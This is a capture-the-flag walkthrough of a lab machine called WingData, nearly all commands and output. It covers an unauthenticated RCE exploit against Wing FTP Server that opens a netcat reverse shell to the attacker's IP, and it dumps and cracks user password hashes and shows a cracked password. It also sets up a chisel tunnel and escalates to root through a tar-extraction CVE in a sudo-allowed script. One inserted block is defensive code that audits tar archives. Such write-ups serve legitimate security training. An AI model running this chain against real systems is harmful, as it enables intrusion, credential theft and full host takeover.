WingData
External Enumeration
Nmap
nmap -sC -sV -Pn -p- -T4 10.129.225.44
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 a1:fa:95:8b:d7:56:03:85:e4:45:c9:c7:1e:ba:28:3b (ECDSA)
|_ 256 9c:ba:21:1a:97:2f:3a:64:73:c1:4c:1d:ce:65:7a:2f (ED25519)
80/tcp open http Apache httpd 2.4.66
|_http-server-header: Apache/2.4.66 (Debian)
|_http-title: WingData Solutions
Service Info: Host: localhost; OS: Linux; CPE: cpe:/o:linux:linux_kernel
sudo nmap -sC -sV --top-ports 100 -sU 10.129.225.44
HTTP (80)
- Has client portal VHOST
ftp.wingdata.htb
- Able to get Unauthenticated RCE on server
- Displays Version
FTP server software powered by Wing FTP Server v7.4.3
Exploiting Wing FTP Server
python3 52347.py -u http://ftp.wingdata.htb -c 'busybox nc 10.10.14.13 4444 -e /bin/sh'
nc -nvlp 4444
- Able to receive reverse shell
- Stabilize Shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl + z
stty raw -echo; fg
stty rows 38 columns 116
Shell as WingFTP
wingftp@wingdata:/opt/wftpserver/Data/1$ cat settings.xml
<SaltingString>WingFTP</SaltingString>
- Collecting all user hashes from
/opt/wftpserver/Data/1
- Creating Hashes List
wingftp@wingdata:/opt/wftpserver/Data/_ADMINISTRATOR$ cat admins.xml
<?xml version="1.0" ?>
<ADMIN_ACCOUNTS Description="Wing FTP Server Admin Accounts">
<ADMIN>
<Admin_Name>admin</Admin_Name>
<Password>a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafba</Password>
<Type>0</Type>
<Readonly>0</Readonly>
<IsDomainAdmin>0</IsDomainAdmin>
<DomainList></DomainList>
<MyDirectory></MyDirectory>
<EnableTwoFactor>0</EnableTwoFactor>
<TwoFactorCode></TwoFactorCode>
</ADMIN>
</ADMIN_ACCOUNTS>
echo 'john:c1f14672feec3bba27231048271fcdcddeb9d75ef79f6889139aa78c9d398f10$WingFTP
maria:a70221f33a51dca76dfd46c17ab17116a97823caf40aeecfbc611cae47421b03$WingFTP
steve:5916c7481fa2f20bd86f4bdb900f0342359ec19a77b7e3ae118f3b5d0d3334ca$WingFTP
wacky:32940defd3c3ef70a2dd44a5301ff984c4742f0baae76ff5b8783994f8a503ca$WingFTP
admin:a8339f8e4465a9c47158394d8efe7cc45a5f361ab983844c8562bef2193bafb$WingFTP' > hashes.txt
- Cracking Hashes
john --format=dynamic='sha256($p.$s)' hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
!#7Blushing^*Bride5 (wacky)
Admin Wing FTP Server
- No Results
wingftp@wingdata:/opt/wftpserver/Data/_ADMINISTRATOR$ cat settings.xml
<?xml version="1.0" ?>
<Administrator Description="Wing FTP Server Administrator Options">
<HttpPort>5466</HttpPort>
<HttpSecure>0</HttpSecure>
<AdminLogfileEnable>1</AdminLogfileEnable>
<AdminLogfileFileName>Admin-%Y-%M-%D.log</AdminLogfileFileName>
<AdminLogfileMaxsize>0</AdminLogfileMaxsize>
<EnablePortUPnP>0</EnablePortUPnP>
</Administrator>
chisel server -p 9001 --reverse
./chisel.1 client 10.10.14.13:9001 R:5466:127.0.0.1:5466
Shell as Wacky
ssh wacky@wingdata.htb
!#7Blushing^*Bride5
- Checking Privileges
wacky@wingdata:~$ sudo -l
Matching Defaults entries for wacky on wingdata:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User wacky may run the following commands on wingdata:
(root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *
- Has vulnerable code
STAGING_BASE = "/opt/backup_clients/restored_backups"
staging_dir = os.path.join(STAGING_BASE, args.restore_dir)
tar.extractall(path=staging_dir, filter="data")
- Vulnerable to
CVE-2025-4517
https://github.com/StealthByte0/CVE-2025-4517-poc/blob/main/CVE-2025-4517.py
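A pre-extraction check a root-run restore script could apply before calling tar.extractall, so it does not depend on filter="data" alone. This is an added example, not code from restore_backup_clients.py or from the original writeup. It assumes backups only need regular files and directories; MAX_MEMBER_PATH, RESTORE_DIR_RE and the function names are hypothetical.

```python
import io
import re
import tarfile

# Assumption: client backups only ever need regular files and directories.
MAX_MEMBER_PATH = 255  # constructed limit, far below PATH_MAX (4096 on Linux)
RESTORE_DIR_RE = re.compile(r"^[A-Za-z0-9_]{1,24}$")  # hypothetical naming policy


def valid_restore_dir(name: str) -> bool:
    """Allow only a single plain directory name for the -r argument."""
    return bool(RESTORE_DIR_RE.fullmatch(name))


def audit_archive(fileobj) -> list[str]:
    """Return reasons to refuse the archive; an empty list means it passed."""
    problems = []
    with tarfile.open(fileobj=fileobj, mode="r:*") as tar:
        for m in tar:
            parts = m.name.split("/")
            if not (m.isreg() or m.isdir()):
                problems.append(f"{m.name[:40]}: member type not allowed (link/device/fifo)")
            if m.name.startswith("/") or ".." in parts:
                problems.append(f"{m.name[:40]}: absolute or parent-relative path")
            if len(m.name) > MAX_MEMBER_PATH:
                problems.append(f"{m.name[:40]}: path longer than {MAX_MEMBER_PATH} bytes")
    return problems


def build_sample(members) -> io.BytesIO:
    """Constructed sample archives for the demonstration below."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        for name, kind, target in members:
            info = tarfile.TarInfo(name)
            info.type = kind
            info.linkname = target
            data = b"client data" if kind == tarfile.REGTYPE else b""
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    good = build_sample([("clients", tarfile.DIRTYPE, ""), ("clients/a.json", tarfile.REGTYPE, "")])
    bad = build_sample([("clients/link", tarfile.SYMTYPE, "../../outside")])
    print(audit_archive(good), audit_archive(bad), valid_restore_dir("restore_01"))
```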
- Update Username, file path, transfer to machine
python3 CVE-2025-4517.py
python3 -m http.server
wget http://10.10.14.13:8000/backup_1001.tar
sudo /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py -b backup_1001.tar -r restore_01
- Check Updated Permissions
wacky@wingdata:/opt/backup_clients/backups$ sudo -l
User wacky may run the following commands on wingdata:
(ALL) NOPASSWD: ALL
Shell as Root
sudo su
root@wingdata:~# cat root.txt
719c0e57ce0465a57dbfcedf8681aaff